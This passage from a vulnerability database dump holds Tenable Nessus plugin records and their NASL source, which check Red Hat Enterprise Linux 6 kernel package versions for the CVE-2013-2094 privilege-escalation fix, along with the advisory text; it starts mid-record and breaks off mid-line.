"p-cpe:/a:redhat:enterprise_linux:kernel-kdump-devel", "p-cpe:/a:redhat:enterprise_linux:perf-debuginfo", "p-cpe:/a:redhat:enterprise_linux:kernel", "cpe:/o:redhat:enterprise_linux:6.2", "p-cpe:/a:redhat:enterprise_linux:python-perf", "cpe:/o:redhat:enterprise_linux:6", "p-cpe:/a:redhat:enterprise_linux:perf", "p-cpe:/a:redhat:enterprise_linux:kernel-doc", "p-cpe:/a:redhat:enterprise_linux:kernel-debuginfo-common-i686"], "id": "REDHAT-RHSA-2013-0840.NASL", "href": "https://www.tenable.com/plugins/nessus/66524", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2013:0840. 
The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(66524);\n script_version(\"1.19\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2013-2094\");\n script_bugtraq_id(59846);\n script_xref(name:\"RHSA\", value:\"2013:0840\");\n\n script_name(english:\"RHEL 6 : kernel (RHSA-2013:0840)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated kernel packages that fix one security issue are now available\nfor Red Hat Enterprise Linux 6.2 Extended Update Support.\n\nThe Red Hat Security Response Team has rated this update as having\nimportant security impact. A Common Vulnerability Scoring System\n(CVSS) base score, which gives a detailed severity rating, is\navailable from the CVE link in the References section.\n\nThe kernel packages contain the Linux kernel, the core of any Linux\noperating system.\n\nThis update fixes the following security issue :\n\n* It was found that the Red Hat Enterprise Linux 6.1 kernel update\n(RHSA-2011:0542) introduced an integer conversion issue in the Linux\nkernel's Performance Events implementation. This led to a\nuser-supplied index into the perf_swevent_enabled array not being\nvalidated properly, resulting in out-of-bounds kernel memory access. A\nlocal, unprivileged user could use this flaw to escalate their\nprivileges. 
(CVE-2013-2094, Important)\n\nA public exploit that affects Red Hat Enterprise Linux 6 is available.\n\nRefer to Red Hat Knowledge Solution 373743, linked to in the\nReferences, for further information and mitigation instructions for\nusers who are unable to immediately apply this update.\n\nUsers should upgrade to these updated packages, which contain a\nbackported patch to correct this issue. The system must be rebooted\nfor this update to take effect.\"\n );\n # https://access.redhat.com/site/solutions/373743\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/solutions/373743\"\n );\n # https://rhn.redhat.com/errata/RHSA-2011-0542.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2011:0542\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2013:0840\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2013-2094\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-debug\");\n 
script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-debug-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-debug-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-debuginfo-common-i686\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-debuginfo-common-s390x\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-debuginfo-common-x86_64\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-firmware\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-headers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-kdump\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-kdump-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-kdump-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:perf\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:perf-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:python-perf\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:python-perf-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6.2\");\n\n 
script_set_attribute(attribute:\"vuln_publication_date\", value:\"2013/05/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/05/20\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/05/21\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"linux_alt_patch_detect.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\ninclude(\"ksplice.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! 
preg(pattern:\"^6([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 6.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nif (get_one_kb_item(\"Host/ksplice/kernel-cves\"))\n{\n rm_kb_item(name:\"Host/uptrack-uname-r\");\n cve_list = make_list(\"CVE-2013-2094\");\n if (ksplice_cves_check(cve_list))\n {\n audit(AUDIT_PATCH_INSTALLED, \"KSplice hotfix for RHSA-2013:0840\");\n }\n else\n {\n __rpm_report = ksplice_reporting_text();\n }\n}\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2013:0840\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL6\", sp:\"2\", cpu:\"i686\", reference:\"kernel-2.6.32-220.34.2.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", sp:\"2\", cpu:\"s390x\", reference:\"kernel-2.6.32-220.34.2.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"kernel-2.6.32-220.34.2.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", sp:\"2\", cpu:\"i686\", reference:\"kernel-debug-2.6.32-220.34.2.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", sp:\"2\", cpu:\"s390x\", reference:\"kernel-debug-2.6.32-220.34.2.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"kernel-debug-2.6.32-220.34.2.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", sp:\"2\", cpu:\"i686\", 
reference:\"kernel-debug-debuginfo-2.6.32-220.34.2.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", sp:\"2\", cpu:\"s390x\", reference:\"kernel-debug-debuginfo-2.6.32-220.34.2.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"kernel-debug-debuginfo-2.6.32-220.34.2.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", sp:\"2\", cpu:\"i686\", reference:\"kernel-debug-devel-2.6.32-220.34.2.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", sp:\"2\", cpu:\"s390x\", reference:\"kernel-debug-devel-2.6.32-220.34.2.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"kernel-debug-devel-2.6.32-220.34.2.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", sp:\"2\", cpu:\"i686\", reference:\"kernel-debuginfo-2.6.32-220.34.2.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", sp:\"2\", cpu:\"s390x\", reference:\"kernel-debuginfo-2.6.32-220.34.2.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"kernel-debuginfo-2.6.32-220.34.2.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", sp:\"2\", cpu:\"i686\", reference:\"kernel-debuginfo-common-i686-2.6.32-220.34.2.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", sp:\"2\", cpu:\"s390x\", reference:\"kernel-debuginfo-common-s390x-2.6.32-220.34.2.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"kernel-debuginfo-common-x86_64-2.6.32-220.34.2.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", sp:\"2\", cpu:\"i686\", reference:\"kernel-devel-2.6.32-220.34.2.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", sp:\"2\", cpu:\"s390x\", reference:\"kernel-devel-2.6.32-220.34.2.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"kernel-devel-2.6.32-220.34.2.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", reference:\"kernel-doc-2.6.32-220.34.2.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", reference:\"kernel-firmware-2.6.32-220.34.2.el6\")) flag++;\n\n if 
(rpm_check(release:\"RHEL6\", sp:\"2\", cpu:\"i686\", reference:\"kernel-headers-2.6.32-220.34.2.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", sp:\"2\", cpu:\"s390x\", reference:\"kernel-headers-2.6.32-220.34.2.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"kernel-headers-2.6.32-220.34.2.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", sp:\"2\", cpu:\"s390x\", reference:\"kernel-kdump-2.6.32-220.34.2.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", sp:\"2\", cpu:\"s390x\", reference:\"kernel-kdump-debuginfo-2.6.32-220.34.2.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", sp:\"2\", cpu:\"s390x\", reference:\"kernel-kdump-devel-2.6.32-220.34.2.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", sp:\"2\", cpu:\"i686\", reference:\"perf-2.6.32-220.34.2.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", sp:\"2\", cpu:\"s390x\", reference:\"perf-2.6.32-220.34.2.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"perf-2.6.32-220.34.2.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", sp:\"2\", cpu:\"i686\", reference:\"perf-debuginfo-2.6.32-220.34.2.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", sp:\"2\", cpu:\"s390x\", reference:\"perf-debuginfo-2.6.32-220.34.2.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"perf-debuginfo-2.6.32-220.34.2.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", sp:\"2\", cpu:\"i686\", reference:\"python-perf-2.6.32-220.34.2.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", sp:\"2\", cpu:\"s390x\", reference:\"python-perf-2.6.32-220.34.2.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", sp:\"2\", cpu:\"x86_64\", reference:\"python-perf-2.6.32-220.34.2.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", sp:\"2\", cpu:\"i686\", reference:\"python-perf-debuginfo-2.6.32-220.34.2.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", sp:\"2\", cpu:\"s390x\", reference:\"python-perf-debuginfo-2.6.32-220.34.2.el6\")) 
flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"python-perf-debuginfo-2.6.32-220.34.2.el6\")) flag++;\n\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel / kernel-debug / kernel-debug-debuginfo / kernel-debug-devel / etc\");\n }\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-17T13:12:33", "description": "Updated kernel packages that fix one security issue are now available\nfor Red Hat Enterprise Linux 6.\n\nThe Red Hat Security Response Team has rated this update as having\nimportant security impact. A Common Vulnerability Scoring System\n(CVSS) base score, which gives a detailed severity rating, is\navailable from the CVE link in the References section.\n\nThe kernel packages contain the Linux kernel, the core of any Linux\noperating system.\n\nThis update fixes the following security issue :\n\n* It was found that the Red Hat Enterprise Linux 6.1 kernel update\n(RHSA-2011:0542) introduced an integer conversion issue in the Linux\nkernel's Performance Events implementation. This led to a\nuser-supplied index into the perf_swevent_enabled array not being\nvalidated properly, resulting in out-of-bounds kernel memory access. A\nlocal, unprivileged user could use this flaw to escalate their\nprivileges. (CVE-2013-2094, Important)\n\nA public exploit that affects Red Hat Enterprise Linux 6 is available.\n\nRefer to Red Hat Knowledge Solution 373743, linked to in the\nReferences, for further information and mitigation instructions for\nusers who are unable to immediately apply this update.\n\nUsers should upgrade to these updated packages, which contain a\nbackported patch to correct this issue. 
The system must be rebooted\nfor this update to take effect.", "edition": 27, "published": "2013-05-17T00:00:00", "title": "RHEL 6 : kernel (RHSA-2013:0830)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-2094"], "modified": "2013-05-17T00:00:00", "cpe": ["p-cpe:/a:redhat:enterprise_linux:python-perf-debuginfo", "p-cpe:/a:redhat:enterprise_linux:kernel-debuginfo", "p-cpe:/a:redhat:enterprise_linux:kernel-kdump", "p-cpe:/a:redhat:enterprise_linux:kernel-debug-devel", "p-cpe:/a:redhat:enterprise_linux:kernel-debuginfo-common-x86_64", "p-cpe:/a:redhat:enterprise_linux:kernel-debuginfo-common-s390x", "p-cpe:/a:redhat:enterprise_linux:kernel-firmware", "p-cpe:/a:redhat:enterprise_linux:kernel-devel", "cpe:/o:redhat:enterprise_linux:6.4", "p-cpe:/a:redhat:enterprise_linux:kernel-debug", "p-cpe:/a:redhat:enterprise_linux:kernel-headers", "p-cpe:/a:redhat:enterprise_linux:kernel-debug-debuginfo", "p-cpe:/a:redhat:enterprise_linux:kernel-kdump-debuginfo", "p-cpe:/a:redhat:enterprise_linux:kernel-kdump-devel", "p-cpe:/a:redhat:enterprise_linux:perf-debuginfo", "p-cpe:/a:redhat:enterprise_linux:kernel", "p-cpe:/a:redhat:enterprise_linux:python-perf", "cpe:/o:redhat:enterprise_linux:6", "p-cpe:/a:redhat:enterprise_linux:perf", "p-cpe:/a:redhat:enterprise_linux:kernel-doc", "p-cpe:/a:redhat:enterprise_linux:kernel-debuginfo-common-i686"], "id": "REDHAT-RHSA-2013-0830.NASL", "href": "https://www.tenable.com/plugins/nessus/66488", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2013:0830. 
The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(66488);\n script_version(\"1.19\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2013-2094\");\n script_xref(name:\"RHSA\", value:\"2013:0830\");\n\n script_name(english:\"RHEL 6 : kernel (RHSA-2013:0830)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated kernel packages that fix one security issue are now available\nfor Red Hat Enterprise Linux 6.\n\nThe Red Hat Security Response Team has rated this update as having\nimportant security impact. A Common Vulnerability Scoring System\n(CVSS) base score, which gives a detailed severity rating, is\navailable from the CVE link in the References section.\n\nThe kernel packages contain the Linux kernel, the core of any Linux\noperating system.\n\nThis update fixes the following security issue :\n\n* It was found that the Red Hat Enterprise Linux 6.1 kernel update\n(RHSA-2011:0542) introduced an integer conversion issue in the Linux\nkernel's Performance Events implementation. This led to a\nuser-supplied index into the perf_swevent_enabled array not being\nvalidated properly, resulting in out-of-bounds kernel memory access. A\nlocal, unprivileged user could use this flaw to escalate their\nprivileges. 
(CVE-2013-2094, Important)\n\nA public exploit that affects Red Hat Enterprise Linux 6 is available.\n\nRefer to Red Hat Knowledge Solution 373743, linked to in the\nReferences, for further information and mitigation instructions for\nusers who are unable to immediately apply this update.\n\nUsers should upgrade to these updated packages, which contain a\nbackported patch to correct this issue. The system must be rebooted\nfor this update to take effect.\"\n );\n # https://access.redhat.com/site/solutions/373743\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/solutions/373743\"\n );\n # https://rhn.redhat.com/errata/RHSA-2011-0542.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2011:0542\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2013:0830\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2013-2094\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-debug\");\n 
script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-debug-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-debug-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-debuginfo-common-i686\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-debuginfo-common-s390x\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-debuginfo-common-x86_64\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-firmware\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-headers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-kdump\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-kdump-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-kdump-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:perf\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:perf-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:python-perf\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:python-perf-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6.4\");\n\n 
script_set_attribute(attribute:\"vuln_publication_date\", value:\"2013/05/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/05/16\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/05/17\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"linux_alt_patch_detect.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\ninclude(\"ksplice.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! 
preg(pattern:\"^6([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 6.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nif (get_one_kb_item(\"Host/ksplice/kernel-cves\"))\n{\n rm_kb_item(name:\"Host/uptrack-uname-r\");\n cve_list = make_list(\"CVE-2013-2094\");\n if (ksplice_cves_check(cve_list))\n {\n audit(AUDIT_PATCH_INSTALLED, \"KSplice hotfix for RHSA-2013:0830\");\n }\n else\n {\n __rpm_report = ksplice_reporting_text();\n }\n}\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2013:0830\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"kernel-2.6.32-358.6.2.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"kernel-2.6.32-358.6.2.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"kernel-2.6.32-358.6.2.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"kernel-debug-2.6.32-358.6.2.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"kernel-debug-2.6.32-358.6.2.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"kernel-debug-2.6.32-358.6.2.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"kernel-debug-debuginfo-2.6.32-358.6.2.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", 
cpu:\"s390x\", reference:\"kernel-debug-debuginfo-2.6.32-358.6.2.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"kernel-debug-debuginfo-2.6.32-358.6.2.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"kernel-debug-devel-2.6.32-358.6.2.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"kernel-debug-devel-2.6.32-358.6.2.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"kernel-debug-devel-2.6.32-358.6.2.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"kernel-debuginfo-2.6.32-358.6.2.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"kernel-debuginfo-2.6.32-358.6.2.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"kernel-debuginfo-2.6.32-358.6.2.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"kernel-debuginfo-common-i686-2.6.32-358.6.2.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"kernel-debuginfo-common-s390x-2.6.32-358.6.2.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"kernel-debuginfo-common-x86_64-2.6.32-358.6.2.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"kernel-devel-2.6.32-358.6.2.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"kernel-devel-2.6.32-358.6.2.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"kernel-devel-2.6.32-358.6.2.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", reference:\"kernel-doc-2.6.32-358.6.2.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", 